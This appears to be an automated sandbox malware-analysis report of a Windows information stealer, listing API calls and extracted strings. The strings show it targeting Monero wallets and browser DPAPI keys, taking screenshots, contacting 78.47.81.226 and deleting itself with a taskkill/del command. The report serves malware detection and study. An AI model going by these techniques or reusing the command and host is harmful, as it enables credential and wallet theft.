                                                                                                                                            • API String ID: 87717484-979203823
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 00460E4F
                                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 00460EC9
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00460EE5
                                                                                                                                            • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00460EF9
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 00460F02
                                                                                                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00460F12
                                                                                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00460F30
                                                                                                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00460F40
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2979504256-3916222277
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00409079
                                                                                                                                            • _memset.LIBCMT ref: 0040908C
                                                                                                                                              • Part of subcall function 00408B9A: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00408BAE
                                                                                                                                              • Part of subcall function 00408B9A: HeapAlloc.KERNEL32(00000000), ref: 00408BB5
                                                                                                                                              • Part of subcall function 00408B9A: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00408BCE
                                                                                                                                              • Part of subcall function 00408B9A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 00408BE7
                                                                                                                                              • Part of subcall function 00408B9A: RegCloseKey.ADVAPI32(?), ref: 00408BF0
                                                                                                                                            • _sprintf.LIBCMT ref: 004090AA
                                                                                                                                            • lstrlenA.KERNEL32(00000001,?,?,?,?,?,?,?,0000001C), ref: 004090B6
                                                                                                                                              • Part of subcall function 004046E9: __EH_prolog3.LIBCMT ref: 004046F0
                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,00000000,00000001,00000002,?,?,?,?,?,?,?,?,?,?,0000001C), ref: 00409183
                                                                                                                                            • CopyFileA.KERNEL32 ref: 0040919E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3Heap$AllocCloseCopyCreateDirectoryFileOpenProcessQueryValue_memset_sprintflstrlen
                                                                                                                                            • String ID: SOFTWARE\monero-project\monero-core$\Monero\$wallet_path
                                                                                                                                            • API String ID: 6233314-1162651061
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0045C025
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000010), ref: 0045C058
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0045C05F
                                                                                                                                            • _memset.LIBCMT ref: 0045C073
                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(00000000), ref: 0045C086
                                                                                                                                              • Part of subcall function 0045EF7B: __EH_prolog3_GS.LIBCMT ref: 0045EF85
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • GlobalMemoryStatus.KERNEL32 ref: 0045C0FF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: GlobalMemoryStatus_memmove$AddressH_prolog3H_prolog3_HandleModuleProc_memset
                                                                                                                                            • String ID: MB$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                            • API String ID: 59999723-2756951423
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0045ED59
                                                                                                                                            • GetCurrentProcessId.KERNEL32(000000CC,00408B06), ref: 0045ED66
                                                                                                                                              • Part of subcall function 0045E46A: OpenProcess.KERNEL32(00000410,00000000,?), ref: 0045E495
                                                                                                                                              • Part of subcall function 0045E46A: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0045E4AF
                                                                                                                                              • Part of subcall function 0045E46A: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0045E4B5
                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0045ED82
                                                                                                                                              • Part of subcall function 0045EC6D: __EH_prolog3_catch.LIBCMT ref: 0045EC8C
                                                                                                                                              • Part of subcall function 0045EC6D: _memset.LIBCMT ref: 0045ECBE
                                                                                                                                              • Part of subcall function 0045EC6D: OpenProcess.KERNEL32(00000410,00000000,?,?,?,0000000C), ref: 0045ECD0
                                                                                                                                              • Part of subcall function 0045EC6D: EnumProcessModules.PSAPI(00000000,?,00000004,00000008,?,?,0000000C), ref: 0045ECE7
                                                                                                                                              • Part of subcall function 0045EC6D: GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,00000008,?,?,0000000C), ref: 0045ECFD
                                                                                                                                              • Part of subcall function 0045EC6D: CloseHandle.KERNEL32(00000000,?,?,0000000C), ref: 0045ED03
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            • ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,?,00000000,00000000), ref: 0045EE56
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseCurrentHandleModuleNameOpen$BaseEnumExecuteFileH_prolog3_H_prolog3_catchModulesShell_memmove_memset
                                                                                                                                            • String ID: & exit$ /f & timeout /t 6 & del /f /q "$" & del C:\ProgramData\*.dll$/c taskkill /im $C:\Windows\System32\cmd.exe
                                                                                                                                            • API String ID: 1929281448-455057220
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0045C883
                                                                                                                                              • Part of subcall function 0040E701: __EH_prolog3.LIBCMT ref: 0040E708
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 00402CCF: _memmove.LIBCMT ref: 00402D20
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0045C91B
                                                                                                                                            • Process32First.KERNEL32 ref: 0045C92E
                                                                                                                                            • Process32Next.KERNEL32 ref: 0045C948
                                                                                                                                              • Part of subcall function 0040DCA9: __EH_prolog3_catch.LIBCMT ref: 0040DCB0
                                                                                                                                              • Part of subcall function 0045B704: __EH_prolog3_catch.LIBCMT ref: 0045B70B
                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000128,00000002,00000000,----------,0000000A,00000001,00000000,00000001,00000003,00000001,00481714,00000000,00000294,0040845B), ref: 0045CC2D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_catchProcess32_memmove$CloseCreateFirstH_prolog3H_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                            • String ID: ----------$----------
                                                                                                                                            • API String ID: 4185073159-2385812570
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 0045EC8C
                                                                                                                                            • _memset.LIBCMT ref: 0045ECBE
                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,0000000C), ref: 0045ECD0
                                                                                                                                            • EnumProcessModules.PSAPI(00000000,?,00000004,00000008,?,?,0000000C), ref: 0045ECE7
                                                                                                                                            • GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,00000008,?,?,0000000C), ref: 0045ECFD
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,0000000C), ref: 0045ED03
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$BaseCloseEnumH_prolog3_catchHandleModuleModulesNameOpen_memset
                                                                                                                                            • String ID: <unknown>
                                                                                                                                            • API String ID: 3374446145-1574992787
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _memset.LIBCMT ref: 0045B8D6
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,00000001,00000000), ref: 0045B8F2
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?,?,00000001,00000000), ref: 0045B911
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000), ref: 0045B91A
                                                                                                                                            • CharToOemA.USER32 ref: 0045B92B
                                                                                                                                            Strings
                                                                                                                                            • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0045B8E8
                                                                                                                                            • ProcessorNameString, xrefs: 0045B909
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                            • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                                                                                            • API String ID: 2235053359-2804670039
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _memset.LIBCMT ref: 0045BA1E
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,004940CC,00000000), ref: 0045BA3A
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?,?,004940CC,00000000), ref: 0045BA59
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,004940CC,00000000), ref: 0045BA62
                                                                                                                                            • CharToOemA.USER32 ref: 0045BA73
                                                                                                                                            Strings
                                                                                                                                            • ProductName, xrefs: 0045BA51
                                                                                                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0045BA30
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                            • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                            • API String ID: 2235053359-1787575317
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _memset.LIBCMT ref: 0045BB9D
                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,00000000,00000000), ref: 0045BBB9
                                                                                                                                            • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,00000000,00000000), ref: 0045BBD8
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000), ref: 0045BBE1
                                                                                                                                            • CharToOemA.USER32 ref: 0045BBF2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0041046B
                                                                                                                                            • _memset.LIBCMT ref: 00410495
                                                                                                                                              • Part of subcall function 0045D0A6: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,0040C6DE,?,0000001A), ref: 0045D0C0
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,0000001C,?,?,00000014), ref: 004104B6
                                                                                                                                            • _memset.LIBCMT ref: 004104C1
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 004104D4
                                                                                                                                            • lstrcatA.KERNEL32(?,00481844,?,?,?,?,?,00000014), ref: 004104E2
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,?,?,?,00000014), ref: 004104F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcat$_memset$FolderH_prolog3Path
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0045CF90
                                                                                                                                            • GetDC.USER32(00000000), ref: 0045CFA6
                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000), ref: 0045CFA9
                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0045CFB5
                                                                                                                                            • GetDC.USER32(00000000), ref: 0045CFC7
                                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 0045CFD5
                                                                                                                                              • Part of subcall function 0045CF28: GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000), ref: 0045CF65
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0045CFEB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CompatibleCreateObject$BitmapDeleteFileGdipImageSaveSelect
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _malloc.LIBCMT ref: 00464B6B
                                                                                                                                              • Part of subcall function 0046632E: __FF_MSGBANNER.LIBCMT ref: 00466347
                                                                                                                                              • Part of subcall function 0046632E: __NMSG_WRITE.LIBCMT ref: 0046634E
                                                                                                                                              • Part of subcall function 0046632E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004644D0,00000001,00000000,?,?,?,0046452E,004026BA), ref: 00466373
                                                                                                                                            • std::exception::exception.LIBCMT ref: 00464BA0
                                                                                                                                            • std::exception::exception.LIBCMT ref: 00464BBA
                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00464BCB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                            • String ID: P&@$bad allocation
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040B62C
                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040B643
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0040B65F
                                                                                                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040B679
                                                                                                                                            • LocalFree.KERNEL32(?), ref: 0040B68F
                                                                                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 0040B69A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove$FileRead_memset
                                                                                                                                            • String ID: winRead
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0045EB3F
                                                                                                                                            • Sleep.KERNEL32(00000064,ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,00000024,?,?,?,00000038,004041B5,?,00000010), ref: 0045EB87
                                                                                                                                            • __time64.LIBCMT ref: 0045EB8F
                                                                                                                                              • Part of subcall function 0046572C: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00465737
                                                                                                                                              • Part of subcall function 0046572C: __aulldiv.LIBCMT ref: 00465757
                                                                                                                                              • Part of subcall function 0045CDE5: _malloc.LIBCMT ref: 0045CDED
                                                                                                                                              • Part of subcall function 0045CDE5: GetTickCount.KERNEL32 ref: 0045CDF8
                                                                                                                                              • Part of subcall function 0045CDE5: _rand.LIBCMT ref: 0045CE0D
                                                                                                                                              • Part of subcall function 0045CDE5: _sprintf.LIBCMT ref: 0045CE20
                                                                                                                                              • Part of subcall function 00468168: __getptd.LIBCMT ref: 0046816D
                                                                                                                                            • _rand.LIBCMT ref: 0045EBBC
                                                                                                                                              • Part of subcall function 0046817A: __getptd.LIBCMT ref: 0046817A
                                                                                                                                              • Part of subcall function 0045D13F: std::_Xinvalid_argument.LIBCPMT ref: 0045D14D
                                                                                                                                            Strings
                                                                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 0045EB5A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Time__getptd_rand$CountFileH_prolog3_catch_SleepSystemTickXinvalid_argument__aulldiv__time64_malloc_sprintfstd::_
                                                                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0045D01B
                                                                                                                                            • GetSystemMetrics.USER32 ref: 0045D027
                                                                                                                                            • GetSystemMetrics.USER32 ref: 0045D02E
                                                                                                                                              • Part of subcall function 0045CF86: CreateCompatibleDC.GDI32(00000000), ref: 0045CF90
                                                                                                                                              • Part of subcall function 0045CF86: GetDC.USER32(00000000), ref: 0045CFA6
                                                                                                                                              • Part of subcall function 0045CF86: CreateCompatibleBitmap.GDI32(00000000), ref: 0045CFA9
                                                                                                                                              • Part of subcall function 0045CF86: SelectObject.GDI32(?,00000000), ref: 0045CFB5
                                                                                                                                              • Part of subcall function 0045CF86: GetDC.USER32(00000000), ref: 0045CFC7
                                                                                                                                              • Part of subcall function 0045CF86: BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 0045CFD5
                                                                                                                                              • Part of subcall function 0045CF86: DeleteObject.GDI32(00000000), ref: 0045CFEB
                                                                                                                                            • GdiplusShutdown.GDIPLUS(?), ref: 0045D046
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CompatibleCreateGdiplusMetricsObjectSystem$BitmapDeleteSelectShutdownStartup
                                                                                                                                            • String ID: screenshot.jpg
                                                                                                                                            • API String ID: 3709458919-673422685
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004610EE
                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00461128
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CreatePointer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2024441833-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _memset.LIBCMT ref: 0042EF39
                                                                                                                                            • CreateFileW.KERNEL32(?,?,00000003,00000000,?,?,00000000), ref: 0042F020
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile_memset
                                                                                                                                            • String ID: psow$winOpen
                                                                                                                                            • API String ID: 3830271748-4101858489
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset$_strcpy_s
                                                                                                                                            • String ID: 1BEF0A57BE110FD467A
                                                                                                                                            • API String ID: 1261871945-2910601657
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00461340
                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00461370
                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0046139D
                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 004613AB
                                                                                                                                              • Part of subcall function 00460E1A: GetFileInformationByHandle.KERNEL32(?,?), ref: 00460E4F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3986731826-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep$ExitProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3633490160-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0040DF93
                                                                                                                                              • Part of subcall function 0040B614: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040B62C
                                                                                                                                              • Part of subcall function 0040B614: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040B643
                                                                                                                                              • Part of subcall function 0040B614: LocalAlloc.KERNEL32(00000040,?), ref: 0040B65F
                                                                                                                                              • Part of subcall function 0040B614: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040B679
                                                                                                                                              • Part of subcall function 0040B614: FindCloseChangeNotification.KERNEL32(?), ref: 0040B69A
                                                                                                                                              • Part of subcall function 0045CDA7: LocalAlloc.KERNEL32(00000040,00000105,00000000,00000104,0040DFD0,0000000F,?,00000000,?,?,?,?,?,?,?,00000014), ref: 0045CDBF
                                                                                                                                              • Part of subcall function 004027C0: std::_Xinvalid_argument.LIBCPMT ref: 004027D3
                                                                                                                                              • Part of subcall function 004027C0: _memmove.LIBCMT ref: 0040280E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$AllocLocal$ChangeCloseCreateFindH_prolog3_NotificationReadSizeXinvalid_argument_memmovestd::_
                                                                                                                                            • String ID: "os_crypt":{"encrypted_key":"$DPAPI
                                                                                                                                            • API String ID: 3192152120-1727391133
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0040737C
                                                                                                                                              • Part of subcall function 004044CB: __EH_prolog3_GS.LIBCMT ref: 004044D5
                                                                                                                                              • Part of subcall function 004044CB: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000814), ref: 004044FB
                                                                                                                                              • Part of subcall function 004044CB: InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00800000,00000001), ref: 00404532
                                                                                                                                              • Part of subcall function 004044CB: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00800000,00000001), ref: 0040455B
                                                                                                                                              • Part of subcall function 004044CB: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040456C
                                                                                                                                              • Part of subcall function 004044CB: InternetReadFile.WININET(00000000,?,000007FF,?), ref: 0040459E
                                                                                                                                              • Part of subcall function 004044CB: InternetCloseHandle.WININET(00000000), ref: 004045A9
                                                                                                                                              • Part of subcall function 004044CB: InternetCloseHandle.WININET(?), ref: 004045B5
                                                                                                                                              • Part of subcall function 004044CB: InternetCloseHandle.WININET(?), ref: 004045C7
                                                                                                                                              • Part of subcall function 00403FCA: _memmove.LIBCMT ref: 00403FEC
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                              • Part of subcall function 004027C0: std::_Xinvalid_argument.LIBCPMT ref: 004027D3
                                                                                                                                              • Part of subcall function 004027C0: _memmove.LIBCMT ref: 0040280E
                                                                                                                                            • _strtok.LIBCMT ref: 00407440
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle_memmove$H_prolog3_HttpOpenRequest$ConnectFileReadSendXinvalid_argument_strtokstd::_
                                                                                                                                            • String ID: 78.47.81.226
                                                                                                                                            • API String ID: 1408896863-2326672712
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0045CCBD: GdipAlloc.GDIPLUS(00000010,0045CF44,?,00000000), ref: 0045CCBF
                                                                                                                                              • Part of subcall function 0045CE71: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0045CE88
                                                                                                                                            • GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000), ref: 0045CF65
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Gdip$Image$AllocEncodersFileSaveSize
                                                                                                                                            • String ID: image/jpeg$screenshot.jpg
                                                                                                                                            • API String ID: 2572949680-3715547155
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • std::exception::exception.LIBCMT ref: 004026B5
                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004026CA
                                                                                                                                              • Part of subcall function 00464B51: _malloc.LIBCMT ref: 00464B6B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
